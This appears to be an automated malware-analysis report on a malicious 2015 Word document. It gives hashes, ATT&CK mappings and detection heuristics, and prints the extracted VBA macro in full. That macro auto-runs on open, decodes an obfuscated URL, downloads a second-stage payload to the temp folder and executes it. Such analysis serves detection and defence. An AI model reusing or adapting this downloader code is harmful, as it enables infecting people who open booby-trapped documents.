Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 54010a02432cfa53…

MALICIOUS

Office (OLE)

54.0 KB Created: 2015-09-03 18:54:00 Authoring application: Microsoft Office Word First seen: 2015-09-14
MD5: f6a13b7e285e43d2c9dccf8b10517323 SHA-1: 3cfeba9d84e79fa9d6410450553c2d8f0f4daf4c SHA-256: 54010a02432cfa53f6a05af6f1dfb908511e3ef13cfd5b6a790799087be5df4a
258 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample contains VBA macros that utilize URLDownloadToFile to download a second-stage payload to the temporary directory. The ShellExecute API is then used to execute the downloaded file. The ClamAV detection 'Doc.Downloader.Donoff-6700491-0' further supports the downloader functionality. The decrypted URL 'ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui' is highly suspicious.

Heuristics 8

  • ClamAV: Doc.Downloader.Donoff-6700491-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Donoff-6700491-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    "URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3018 bytes
SHA-256: 4eba1d0fa2664a2e5ad04d80f626fe0f3dcb7c4215797bd87f8995b2409e81ff
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Macro Name: rCwOyUEPUQd

Private Declare PtrSafe Function hzwSoNSObetOP Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal DcFkT As Long, ByVal PEYPGTe As String, _
ByVal MMAmNkwKsJvzZNKEWUrMlrnz As String, ByVal CQnoxHCgvNiBvlQZ As String, ByVal bYeOHOtGFV As String, ByVal YcTtHAlSUpRWkuPdQCeAzb As Long) As Long

Private Declare PtrSafe Function loIypDNwwjkK Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _
ByVal jzAVXhEmPfLRltiOJJ As String, ByVal INyryd As Long, ByVal DpFIL As Long) As Long

Private Sub rCwOyUEPUQd()
Dim iDrAXSwyfyEMBhqrpuRX As String, qUhhwADuTjcLtwQtxLH As String, rEeeFNZCVBYrQ As String, uIQRbztWYFL As String, fndIDECHszG As String, WxxMDFxWze As String
qUhhwADuTjcLtwQtxLH = Decrypt("fyf/byy")
rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH


iDrAXSwyfyEMBhqrpuRX = Decrypt("ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui")

loIypDNwwjkK 0, iDrAXSwyfyEMBhqrpuRX, rEeeFNZCVBYrQ, 0, 0
hzwSoNSObetOP 0, "open", rEeeFNZCVBYrQ, "", vbNullString, vbNormalFocus
End Sub

Private Sub Document_Open()

rCwOyUEPUQd
End Sub

Private Function Decrypt(enc)
    Dim x, i, tmp
    enc = StrReverse(enc)
    For i = 1 To Len(enc)
        x = Mid(enc, i, 1)
        tmp = tmp & Chr(Asc(x) - 1)
    Next
    Decrypt = tmp
End Function


Attribute VB_Name = "NewMacros"
'Macro Name: rCwOyUEPUQd

Private Declare PtrSafe Function hzwSoNSObetOP Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal DcFkT As Long, ByVal PEYPGTe As String, _
ByVal MMAmNkwKsJvzZNKEWUrMlrnz As String, ByVal CQnoxHCgvNiBvlQZ As String, ByVal bYeOHOtGFV As String, ByVal YcTtHAlSUpRWkuPdQCeAzb As Long) As Long

Private Declare PtrSafe Function loIypDNwwjkK Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _
ByVal jzAVXhEmPfLRltiOJJ As String, ByVal INyryd As Long, ByVal DpFIL As Long) As Long

Private Sub rCwOyUEPUQd()
Dim iDrAXSwyfyEMBhqrpuRX As String, qUhhwADuTjcLtwQtxLH As String, rEeeFNZCVBYrQ As String, uIQRbztWYFL As String, fndIDECHszG As String, WxxMDFxWze As String
qUhhwADuTjcLtwQtxLH = Decrypt("fyf/byy")
rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH


iDrAXSwyfyEMBhqrpuRX = Decrypt("ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui")

loIypDNwwjkK 0, iDrAXSwyfyEMBhqrpuRX, rEeeFNZCVBYrQ, 0, 0
hzwSoNSObetOP 0, "open", rEeeFNZCVBYrQ, "", vbNullString, vbNormalFocus
End Sub

Private Sub Document_Open()

rCwOyUEPUQd
End Sub

Private Function Decrypt(enc)
    Dim x, i, tmp
    enc = StrReverse(enc)
    For i = 1 To Len(enc)
        x = Mid(enc, i, 1)
        tmp = tmp & Chr(Asc(x) - 1)
    Next
    Decrypt = tmp
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.